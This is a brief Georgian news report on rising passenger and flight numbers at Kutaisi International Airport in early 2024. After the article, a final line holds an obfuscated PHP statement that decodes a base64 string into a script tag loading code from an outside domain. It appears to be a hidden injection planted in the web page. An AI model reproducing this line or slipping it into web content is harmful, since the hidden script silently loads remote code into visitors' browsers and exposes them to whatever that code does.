celsiusi
ავერსი საქკაბელი

2024 წლის მარტში ქუთაისის დავით აღმაშენებლის სახელობის საერთაშორისო აეროპორტში მგზავრთნაკადი 2023 წლის ანალოგიურ პერიოდთან შედარებით, 39 %-ით გაიზარდა. საქართველოს აეროპორტების გაერთიანების ინფორმაციით, მარტში დავით აღმაშენებლის სახელობის აეროპორტით 127,569 მგზავრმა ისარგებლა. (2023 წლის მარტი 91,802 მგზავრი).

მგზავრთნაკადის გარდა, წლის დასაწყისში ქუთაისის საერთაშორისო აეროპორტში ავიარეისების რაოდენობის კუთხითაც ზრდა იყო. მარტში აეროპორტში რეისები გასული წლის ანალოგიურ პერიოდთან შედარებით 23 %-ით გაიზარდა და 374 რეისს მოემსახურა. ( 2023 წლის მარტი - 304 რეისი).

2024 წლის სამი თვის ჯამში, ქუთაისის საერთაშორისო აეროპორტში მგზავრთკანადი 57%-ით, ხოლო რეისების რაოდენობა - 42 %-ით გაიზარდა.

საქართველოს აეროპორტების გაერთიანების ინფორმაციით, ამ ეტაპისთვის, ქუთაისის საერთაშორისო აეროპორტიდან 5 ავიაკომპანია ოპერირებს. რეისები 20 ქვეყნის 39 მიმართულებით სრულდება.

164
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");